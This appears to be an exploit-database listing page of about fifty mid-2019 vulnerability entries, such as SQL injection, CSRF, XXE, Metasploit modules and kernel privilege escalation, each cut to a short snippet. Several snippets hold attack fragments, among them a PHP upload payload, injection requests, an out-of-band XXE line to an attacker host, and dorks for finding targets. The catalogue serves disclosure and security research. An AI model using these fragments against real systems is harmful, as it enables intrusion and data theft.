47904 matches found
Adive Framework 2.0.7 - Cross-Site Request Forgery
Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery CSRF Date:02/08/2019. Exploit Author: Pablo Santiago Vendor Homepage: https://adive.es Software Link: https://github.com/ferdinandmartin/adive-php7 Version: 2.0.7 Tested on: Windows and Kali linux CVE :2019-14346 1. Technical...
Aptana Jaxer 1.0.3.4547 - Local File inclusion
Exploit Title: Aptana Jaxer Remote Local File inclusion Date: 8/8/2019 Exploit Author: Steph Jensen Vendor Homepage: http://www.jaxer.org Version: 1.0.3.4547 Tested on: Linux CVE : CVE-2019-14312 Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source...
Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)
Exploit Title: Daily Expense Manager - CSRF Delete Income Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: August 8, 2019 Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/ Tested Version: 1.0 Tested on: Parrot OS PoC:...
Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability
iterating&iteratinglisteners, true; for auto& listenerref : availabilitylisteners auto listener = listenerref.get; if !listener-urls.Containsurl continue; auto screenavailability = GetScreenAvailabilitylistener-urls; DCHECKscreenavailability != mojom::blink::ScreenAvailability::UNKNOWN; for auto...
WordPress Plugin JoomSport 3.3 - SQL Injection
Exploit Title: JoomSport 3.3 – for Sports - SQL injection Google Dork: intext:powered by JoomSport - sport WordPress plugin Date:29/07/2019. Exploit Author: Pablo Santiago Vendor Homepage: https://beardev.com/ Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management...
ARMBot Botnet - Arbitrary Code Execution
import requests URL = "http://127.0.0.1/ARMBot/upload.php" r = requests.postURL, data = "file":"../publichtml/lol/../.s.phtml", need some trickery for each server ; "data":"PD9waHAgZWNobyAxOyA/Pg==", "message":"Bobr Dobr" , proxies="http":"127.0.0.1:8080","https":"127.0.0.1:8080" printr.statuscod...
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache Tika Header Command Injection', 'Description' = %q This module exploits a command injection vulnerability in Apache Tika 1.15 - 1.17 on...
macOS iMessage - Heap Overflow when Deserializing
There is a heap overflow in NSURL initWithCoder: that can be reached via iMessage and likely other paths. When an NSURL is deserialized, one property its plist can contain is NS.minimalBookmarkData, which is then used as a parameter for NSURL...
Sar2HTML 3.2.1 - Remote Command Execution
Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application you will see index.php?plot url...
Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection
Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection Date: 1.8.2019. Exploit Author: n1x MS-WEB Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 CWE : CWE-89 Vulnerable parameter: slug news.php GET Request GET //host/path/news.php?slug=x'...
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
1CRM On-Premise Software 8.5.7 Stored XSS //////////////////////////////////////////////////////////////////////////////////// Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting Date: 19/07/2019 Exploit Author: Kusol Watchara-Apanukorn Vendor Homepage: https://1crm.com/ Version:...
SilverSHielD 6.x - Local Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit Title: extenua SilverSHielD 6.x local priviledge escalation Google Dork: na Date: 31 Jul 2019 Exploit Author: Ian Bredemeyer Vendor Homepage:...
Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery
Product : Catalyst 3850 Series Device Manager Version : 3.6.10E Date: 01.08.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Alperen Soydan Description : The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify...
WebIncorp ERP - SQL injection
Exploit Title: WebIncorp ERP - SQL injection Date: 1.8.2019. Exploit Author: n1x MS-WEB Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar Version: Every version CWE : CWE-89 Vulnerable parameter: prodid productdetail.php GET Request GET https://host/productdetail.php?prodid=x...
Ultimate Loan Manager 2.0 - Cross-Site Scripting
Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: http://www.webstudio.co.zw/ Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884 Version: V2.0 Category: Webapps Software...
Oracle Hyperion Planning 11.1.2.3 - XML External Entity
Exploit Title: XXE Injection Oracle Hyperion - Exploit Author: Lucas Dinucci [email protected] - Twitter: @identik1t - Vendor Homepage: https://www.oracle.com/applications/performance-management - Date: 02/11/2019 - Affected Product: Oracle Hyperion Enterprise Performance Management System -...
iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects
The class NSDataFileBackedFuture can be deserialized even if secure encoding is enabled. This class is a file-backed NSData object that loads a local file into memory when the NSData bytes selector is called. This presents two problems. First, it could potentially allow undesired access to local...
iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1
There is a memory corruption vulnerability when decoding an object of class NSKnownKeysDictionary1. This class decodes an object of type NSKnownKeysMappingStrategy1, which decodes a length member which is supposed to represent the length of the keys of the dictionary. However, this member is...
iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References
When deserializing a class with initWithCoder, subclasses of that class can also be deserialized so long as they do not override initWithCoder and implement all methods that require a concrete implementation. PFArray is such a subclass of NSArray. When a PFArray is deserialized, it is deserialize...
macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded
While fuzzing JavaScriptCore, I encountered the following modified and commented JavaScript program which crashes jsc from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: function v2trigger // Force JIT compilation. for let v7 = 0; v7 1000000; v7++ if...
macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles
While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: // Run with --useConcurrentJIT=false --thresholdForJITAfterWarmUp=10 function fullGC for var i = 0; i 10; i++ new...
macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances
When deserializing NSObjects with the NSArchiver API 1, one can supply a whitelist of classes that are allowed to be unarchived. In that case, any object in the archive whose class is not whitelisted will not be deserialized. Doing so will also cause the NSKeyedUnarchiver to "requireSecureCoding"...
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Redis Unauthenticated Code Execution', 'Description' = %q This module can be used to leverage the extension functionality added by Redis 4.x and...
Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming
Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera Shodan Dork: html:"@WebVersion@" Date: 08/29/2019 Exploit Author: Jacob Baines Vendor Homepage: https://amcrest.com/ Software Link: https://amcrest.com/firmwaredownloads Affected Version: V2.520.AC00.18.R Fixed Version:...
Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Schneider Electric Pelco Endura NET55XX Encoder", 'Description' = %q This module exploits inadequate access controls within the webUI to enable t...
WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting
Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9 Persistent XSS Injection Google Dork: inurl:"/wp-content/themes/realestate-7/" Date: 2019/07/20 Author: m0ze Vendor Homepage: https://contempothemes.com Software Link:...
GigToDo 1.3 - Cross-Site Scripting
Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection Google Dork: - Date: 2019/07/28 Author: m0ze Vendor Homepage: https://www.gigtodoscript.com Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397 Version: = 1.3 Tested on:...
WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery
Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin Date: 2019-07-27 Exploit Author: rubyman Vendor Homepage: https://wordpress.org/plugins/simple-membership/ wpvulndb : https://wpvulndb.com/vulnerabilities/9482 Version: 3.8.4 Tested on: Windows 8.1 CVE : CVE-2019-1432...
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WP Database Backup RCE', 'Description' = %q There exists a command injection vulnerability in the Wordpress plugin wp-database-backup for version...
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)
Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. Metasploit Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe Version: 7.x 'Ahsay Backup...
Moodle Filepicker 3.5.2 - Server Side Request Forgery
Exploit Title: Server Side Request Forgery in Moodle Filepicker Google Dork: / Date: 2019-07-25 Exploit Author: Fabian Mosch & Nick Theisinger r-tec IT Security GmbH Vendor Homepage: https://moodle.org/ Software Link: https://github.com/moodle/moodle Version: Moodle Versions 3.4, 3.3, 3.3.3, 3.2 ...
Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection
Unauthenticated XML External Entity XXE in Ahsay Backup v7.x - v8.1.0.50. Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe Version: 7.x %remote;%intern; %trick; On http://attacker/oob add the following...
pdfresurrect 0.15 - Buffer Overflow
Exploit Title: pdfresurrect 0.15 Buffer Overflow Date: 2019-07-26 Exploit Author: j0lama Vendor Homepage: https://github.com/enferex/pdfresurrect Software Link: https://github.com/enferex/pdfresurrect Version: 0.15 Tested on: Ubuntu 18.04 CVE : CVE-2019-14267 Description =========== PDFResurrect...
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
Exploit Title: Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution Authenticated Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe Version: 7.x 8.1.1.50 Tested on: Windows / Linux CVE :...
Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
include include / EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47176.zip / / PREPROCESSOR DEFINITIONS / define MNSELECTITEM 0x1E5 define MNSELECTFIRSTVALIDITEM 0x1E7 define MNOPENHIERARCHY 0x01E3 define MNCANCELMENUS 0x1E6 define MNBUTTONDOWN...
Ovidentia 8.4.3 - Cross-Site Scripting
------------------------------------------------------- Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3 Description: The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. Date: 06/05/2019 CVE: CVE-2019-13977 Exploit Author: Fernando Pinheiro n3k00n3 Victor Flores...
MyBB < 1.8.21 - Remote Code Execution
/ Exploit Title: MyBB 1.8.21 Authenticated RCE Date: July 24, 2019 Exploit Author: Giovanni Chhatta https://www.linkedin.com/in/giovannichhatta/ Vendor Homepage: https://mybb.com/ Software Link: https://resources.mybb.com/downloads/mybb1820.zip Version: 1.8.20 Tested on: Windows 10 Blog:...
Ovidentia 8.4.3 - SQL Injection
------------------------------------------------------- Exploit Title: Ovidentia CMS - SQL Injection Authenticated Date: 06/05/2019 CVE: CVE-2019-13978 Exploit Author: Fernando Pinheiro n3k00n3 Victor Flores UserX Vendor Homepage: https://www.ovidentia.org/ Version: 8.4.3 Tested on: Mac,linux -...
WebKit - Universal Cross-Site Scripting due to Synchronous Page Loads
BACKGROUND As lokihardt@ has demonstrated in https://bugs.chromium.org/p/project-zero/issues/detail?id=1121, WebKit's support of the obsolete showModalDialog method gives an attacker the ability to perform synchronous cross-origin page loads. In certain conditions, this might lead to...
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation
// Linux 4.10 // - added known helper paths // - added search for suitable helpers // - added automatic targeting // - changed target suid exectuable from passwd to pkexec // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272 // --- // Tested on: // - Ubuntu 16.04.5 kernel...
Android 7 < 9 - Remote Code Execution
Exploit Title: Android 7-9 - Remote Code Execution Date: date Exploit Author: Marcin Kozlowski Version: 7-9 Tested on: Android CVE : 2019-2107 CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with...
Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read
The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method ETTapMessage initWithArchiveData: checks that the points array is twice as long as the deltas array, but only checks that...
WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions
Exploit Title: Wordpress Hybrid Composer = 1.4.6 - Unauthenticated Configuration Access Admin Takeover Date: 2019-07-24 Vendor Homepage: http://wordpress.framework-y.com Software Link: http://wordpress.framework-y.com/hybrid-composer/ Reference:...
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery
Product : Cisco Wireless Controller Version : 3.6.10E last version Date: 23.07.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Mehmet Önder Key Website: htts://cloudvist.com CVE: CVE-2019-12624 Description : The application interface allows users to perform certain actions via HTTP...
NoviSmart CMS - SQL injection
Exploit Title: NoviSmart CMS SQL injection Date: 23.7.2019. Exploit Author: n1x MS-WEB Vendor Homepage: http://www.novismart.com/ Version: Every version CVE : CWE-89 Vulnerable parameter: Referer HTTP Header field GET Request GET / HTTP/1.1 Referer:...
Trend Micro Deep Discovery Inspector IDS - Security Bypass
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt + ISR: Apparition Security Vendor www.trendmicro.com Product Deep Discovery Inspector Deep Discovery...
Axway SecureTransport 5 - Unauthenticated XML Injection
Title: Axway SecureTransport 5 - Unauthenticated XML Injection Google Dork: intitle:"Axway SecureTransport" "Login" Date: 2019-07-20 Author: Dominik Penner / zer0pwn of Underdog Security Vendor Homepage: https://www.axway.com/en Software Link:...
BACnet Stack 0.8.6 - Denial of Service
Exploit Title: BACnet Stack 0.8.6 - Denial of Service Google Dork: if applicable Date: 2019-07-19 Exploit Author: mmorillo Vendor Homepage: https://sourceforge.net/p/bacnet/ Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/ Version: bacnet-stack-0.8.6...
Comtrend-AR-5310 - Restricted Shell Escape
Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape Date: 2019-07-20 Exploit Author: AMRI Amine Vendor Homepage: https://www.comtrend.com/ Version: GE31-412SSG-C01R10.A2pG039u.d24k Tested on: Linux busybox TL;DR: A local user can bypass the restricted shell using the command substitution...
Web Ofisi Emlak 2 - 'ara' SQL Injection
Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html Demo Site: http://demobul.net/emlakv2/ Version: v2 Tested on: Kali Linux CVE: N/A ----- PoC: SQLi ----- Request:...